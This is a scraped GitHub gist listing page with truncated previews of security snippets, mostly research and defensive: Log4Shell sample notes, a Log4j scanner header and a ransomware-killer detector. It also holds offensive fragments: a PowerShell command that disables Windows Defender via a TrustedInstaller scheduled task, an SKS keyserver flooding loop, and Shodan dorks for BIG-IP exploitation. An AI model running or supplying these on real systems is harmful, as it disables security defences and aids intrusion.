Skip to content

Instantly share code, notes, and snippets.


Vesselin Bontchev bontchev

View GitHub Profile
nathanqthai /
Last active Dec 23, 2021
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence


Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.


The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

gnremy / CVE-2021-44228_IPs.csv
Last active Jan 9, 2022
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
View CVE-2021-44228_IPs.csv
ip tag_name Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt
byt3bl33d3r /
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (
#! /usr/bin/env python3
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
geek-at /
Created Aug 13, 2020
The script used to trash a banking phishing site
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
cihanmehmet /
Last active Dec 22, 2021
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"


tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
jthuraisamy /
Last active Dec 28, 2021
GospelRoom: Data Storage in UEFI NVRAM Variables

GospelRoom: Data Storage in UEFI NVRAM Variables


Persist data in UEFI NVRAM variables.


  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
View Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
# Kill all parent processes from detected vssadmin process
$p = $EventArgs.NewEvent.TargetInstance
while ($p) {
$ppid = $p.ParentProcessID
$pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
Write-Host $p.ProcessID
alpakido /
Last active Dec 13, 2020
Redacted SKS exploit that was sent to me by attacker behind
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
AveYo / .. MediaCreationTool.bat
Last active Jan 21, 2022
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 21H1 with business (Enterprise) edition support
View .. MediaCreationTool.bat

We did it! We broke ;) So head over to the new home! Thank you all!
2021.10.20: now open for interaction

  • new update introducing no 11 setup checks on boot in VirtualBox

Not just an Universal MediaCreationTool wrapper script with ingenious support for business editions,
A powerful yet simple windows 10 / 11 deployment automation tool as well!

configure via set vars, commandline parameters or rename script like iso 21H2 Pro MediaCreationTool.bat
recommended windows setup options with the least amount of issues on upgrades set via auto.cmd